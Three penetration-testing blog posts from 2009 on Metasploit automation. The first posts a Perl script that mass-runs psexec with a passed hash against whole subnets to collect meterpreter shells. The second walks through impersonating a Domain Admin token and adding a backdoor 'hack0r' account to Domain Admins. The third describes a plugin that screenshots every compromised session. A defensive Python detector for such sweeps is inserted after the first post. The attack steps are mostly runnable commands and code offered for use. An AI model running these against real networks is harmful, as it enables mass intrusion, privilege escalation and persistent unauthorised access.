Metasploit PSEXEC scanner (via Perl)

December 17, 2009

(01/14/09) Update: I built a psexec.pl script that can be found here.

Metasploit’s psexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish Metasploit had is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range
foreach(1.. 254) {
    print "set RHOST 192.168.1.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}
# second range
foreach(1.. 254) {
    print "set RHOST 192.168.2.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}

Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc

Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via a resource file. Once Metasploit loads psexec.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra
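
From the defender's side, the sweep this post describes has a recognizable shape: one source making NTLM network logons as the same local account against many hosts a couple of seconds apart. The Python sketch below is an added example, not part of the original post or of Metasploit; it assumes logon events have already been collected as Windows Security Event 4624 records, and the addresses, host names and thresholds are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed tuning values, not from the post
MIN_HOSTS = 20

def find_sweeps(events, window=WINDOW, min_hosts=MIN_HOSTS):
    """Map (source IP, account) -> most distinct hosts reached in one window,
    for NTLM network logons (Event 4624, LogonType 3) reaching min_hosts."""
    recent = defaultdict(deque)  # (source, account) -> (time, host) pairs
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["EventID"] != 4624 or ev["LogonType"] != 3:
            continue
        if ev["AuthenticationPackageName"].upper() != "NTLM":
            continue  # a pass-the-hash logon authenticates over NTLM
        key = (ev["IpAddress"], ev["TargetUserName"].lower())
        seen = recent[key]
        seen.append((ev["time"], ev["Computer"]))
        while ev["time"] - seen[0][0] > window:  # drop entries older than window
            seen.popleft()
        hosts = {host for _, host in seen}
        if len(hosts) >= min_hosts:
            alerts[key] = max(alerts.get(key, 0), len(hosts))
    return alerts

def sample_events():
    """Constructed events: one 2-second sweep plus two benign patterns."""
    t0 = datetime(2009, 12, 17, 9, 0, 0)
    def ev(secs, src, host, user, pkg="NTLM"):
        return {"time": t0 + timedelta(seconds=secs), "EventID": 4624,
                "LogonType": 3, "AuthenticationPackageName": pkg,
                "IpAddress": src, "TargetUserName": user, "Computer": host}
    events = [ev(2 * i, "10.0.0.50", f"WS-1-{i}", "Administrator")
              for i in range(1, 41)]   # sweep: 40 hosts, 2 seconds apart
    events += [ev(60 * i, "10.0.0.7", f"SRV-{i}", "joe-admin", pkg="Kerberos")
               for i in range(1, 31)]  # Kerberos logons are out of scope here
    events += [ev(300 * i, "10.0.0.8", f"FS-{i}", "Administrator")
               for i in range(1, 4)]   # an admin touching three file servers
    return events

if __name__ == "__main__":
    for (src, user), count in find_sweeps(sample_events()).items():
        print(f"possible psexec sweep: {src} as {user} -> {count} hosts")
```

A slower sweep needs a longer window or a lower threshold; tune both against normal administrative traffic.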


Hunting for Domain Admin Tokens

December 15, 2009

Penetration assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code really excels: less time is wasted on mundane tasks. Automation is always key, as long as you automate the tasks that should be automated. Clearly there are specific tasks that can’t or shouldn’t be automated, but that is a topic for another post.

One nice example I have seen during several on-site assessments is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can take hours of manual work. I mentioned this to HD Moore, and he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.

Next, we need to build a list of users that are within the Domain Admins group. This list can be generated using:
net groups "Domain Admins" /domain

Example of the file:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin

We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

To achieve Domain Admin privileges, we need to connect to a session that contains a Domain Admin token.
msf> sessions -i [session-with-domain-admin-token]

Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

Lastly, we add a new account to the domain and add the account into the Domain Admins group.
C:\> net user hack0r h4ck0r) /add /domain
C:\> net group "Domain Admins" hack0r /add /domain

Enjoy it and Pwn dem v0hns!

Regards,
Jabra


Build a collage of your next pentest

December 12, 2009

Here is some code I wrote recently that will take a screenshot of all active Metasploit sessions:

http://spl0it.org/files/patches/metasploit/screenshoter.rb

To leverage this code, just copy the file into the plugins directory of Metasploit v3. Then open up msfconsole and exploit several systems…

Finally, load the plugin and run the screenshot_all_sessions command:
msf> load screenshoter
msf> screenshot_all_sessions

All screenshots will be saved to disk. I have included the IP address in the filename to make things easier for data correlation.

Happy Holidays! Ph33r!

-Jabra